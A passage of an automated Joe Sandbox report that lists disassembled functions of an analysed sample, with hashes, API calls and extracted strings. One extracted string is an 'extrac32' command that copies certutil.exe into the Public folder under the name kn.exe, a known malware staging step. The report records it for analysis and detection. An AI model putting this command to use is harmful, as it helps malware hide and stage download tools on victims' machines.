                                      • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                      • Instruction Fuzzy Hash: BCA1E4EBB0864386FB64AB25D8502BAA791BF85F9CFC84135D94E47AD5DF3CA805C310
                                      Function 00007FF755CB89E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InformationQueryToken
                                      • String ID:
                                      • API String ID: 4239771691-0
                                      • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                      • Instruction ID: ea263c37f89da8be4afaf26d64119b07ca01676870b0a2111c2953b0c18c7aa9
                                      • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                      • Instruction Fuzzy Hash: 7D1152F7618782CBEB119F01E4003A9FBA4FB85BA9F884131DB4843694DB7DD588CB50
                                      Function 00007FF755CB8114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FileInformation$HandleQueryVolume
                                      • String ID:
                                      • API String ID: 2149833895-0
                                      • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                      • Instruction ID: a4784cfddd2733536d4f073c4d6325944f77859458b4bed054281874e0eb47f4
                                      • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                      • Instruction Fuzzy Hash: 88115E766086C286E760DB50F4403AEF7A0FB84F98FC85131DA9D42A98DFBCD848CB10
                                      Function 00007FF755CA8510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • towupper.MSVCRT ref: 00007FF755CA85D4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                      • String ID:
                                      • API String ID: 3520273530-0
                                      • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                      • Instruction ID: 74fc19b69686988f231d6afba240136d7b8b70725e463e4db9f64724c692ab26
                                      • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                      • Instruction Fuzzy Hash: 616196B7A0820387FB64BE24D514379AAA0FB44F5CFC89536DE1E562D5DE3C9880C721
                                      Function 00007FF755CB898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InformationQueryToken
                                      • String ID:
                                      • API String ID: 4239771691-0
                                      • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                      • Instruction ID: 875a9ddc95e44ca64bfd4ae18c1cdd2d4c10fbac3c5d1ef47ef755c8cab2c0a0
                                      • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                      • Instruction Fuzzy Hash: CAF030B7B14B82CBD7019F64E58449CB778F744B98799853ACB2803704DB75D9A4CB50
                                      Function 00007FF755CB93B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CB93BB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                      • Instruction ID: be66ad6f4b71db0c46e88be11e0638df3ff9a333279ef564ee01d2f77ab91b4c
                                      • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                      • Instruction Fuzzy Hash: B4B01299F29443D1D604BB31DC8106052A07F6CF25FC41471C00EC41A0EE1CD5DBC710
                                      Function 00007FF755CAF8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF755CAF52A,00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF8DE
                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF8FB
                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF951
                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF96B
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAFA8E
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CAFB14
                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAFB2D
                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAFBEA
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CAF996
                                        • Part of subcall function 00007FF755CB0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF755CC849D,?,?,?,00007FF755CCF0C7), ref: 00007FF755CB0045
                                        • Part of subcall function 00007FF755CB0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF755CCF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CB0071
                                        • Part of subcall function 00007FF755CB0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB0092
                                        • Part of subcall function 00007FF755CB0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CB00A7
                                        • Part of subcall function 00007FF755CB0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF755CB0181
                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBD401
                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBD41B
                                      • longjmp.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBD435
                                      • longjmp.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CBD480
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                      • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      • API String ID: 3964947564-518410914
                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                      • Instruction ID: 739c5bfe93da3d06717b8fa806fb7dfeb09c3d3146ecdaab34266010979c1c5f
                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                      • Instruction Fuzzy Hash: 550271AFA0964386EA55BB21E8402B8F6A1FF45F6DFDC4539D90E47294DF3CA801C760
                                      Function 00007FF755CB02A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$iswspacewcschr
                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                      • API String ID: 840959033-3627297882
                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                      • Instruction ID: 84ccae9cf6bb8ef8ba266d600c495aba10c69bcca11557a0e2c2c3b5d9a0dc12
                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                      • Instruction Fuzzy Hash: 97D17DABE0864386FB50BB21E8552B9A7A0EF44F5CFCC9435CA4D86295DF3CE8458770
                                      Function 00007FF755CB081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$EnvironmentVariable
                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                      • API String ID: 198002717-267741548
                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                      • Instruction ID: 2cbf87229a563b696bb34880949a59dff5744b50a9bc453c16b8babc0712eaa2
                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                      • Instruction Fuzzy Hash: 065181ABE0868386F6507B11B840279EBA0FF49F99FCCA035CA0E97654DF7DE4448360
                                      Function 00007FF755CAEF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                      Download Yara Rule
                                      APIs
                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF755CAE626,?,?,00000000,00007FF755CB1F69), ref: 00007FF755CAF000
                                      • wcschr.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF031
                                      • iswdigit.MSVCRT(?,?,00000000,00007FF755CB1F69,?,?,?,?,?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000), ref: 00007FF755CAF0D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigitiswspacewcschr
                                      • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                      • API String ID: 1595556998-2755026540
                                      • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                      • Instruction ID: 2dad7137da83c0a4811081772e2b18503bf7e864f9f146270bf36129251ce9c6
                                      • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                      • Instruction Fuzzy Hash: 50227EEFD0865385FA607B15E444279EAA0BF05F98FDC5936DA8D422E0DF3CA4429770
                                      Function 00007FF755CAD3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                      • String ID: "$=,;
                                      • API String ID: 3545743878-4143597401
                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                      • Instruction ID: bb554990267ab4958dd4a07af54049f870b490769d29829265839a3d24e2441f
                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                      • Instruction Fuzzy Hash: 37C181EBA0969382EB656B11D000379FAA1FF85F4CFCD9835DA4E47394EF3CA4458260
                                      Function 00007FF755CC5BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentFormatMessageThread
                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                      • API String ID: 2411632146-3173542853
                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                      • Instruction ID: 1d326c0d198bc09aa12f415690e7aea9be66423552efcc111c3b6557cc08d57d
                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                      • Instruction Fuzzy Hash: 7A615DFAA0978381EA64FB61A5085B9A3A0FF44F8CFC8113ADA5D57758CF3CE5418760
                                      Function 00007FF755CB26E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateFile_open_osfhandle
                                      • String ID: con
                                      • API String ID: 2905481843-4257191772
                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                      • Instruction ID: 374f612b63c3c6b251445eaf95032d11491ccb1462b95c464da7b55460eaf717
                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                      • Instruction Fuzzy Hash: 7471DAB7A086838AE360AF54E440679F6A0FB4AF75FD84234DA5E42794DF3CD445C710
                                      Function 00007FF755CC93E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                      • String ID:
                                      • API String ID: 3829876242-3916222277
                                      • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                      • Instruction ID: 611d952a9ce7c3b998ed60b7c6f603e4dff9de81529cb2d93747513e328670fd
                                      • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                      • Instruction Fuzzy Hash: 7261616BA0868386E654AB11D41017EFBA1FF89F98F899234DE1E47794DF3CE9058720
                                      Function 00007FF755CD1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                      • String ID: CSVFS$NTFS$REFS
                                      • API String ID: 3510147486-2605508654
                                      • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                      • Instruction ID: 8999e5da9e8b63699fbe65cc9a7a1410ec433d09ddf45d9770235587c1a7e28e
                                      • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
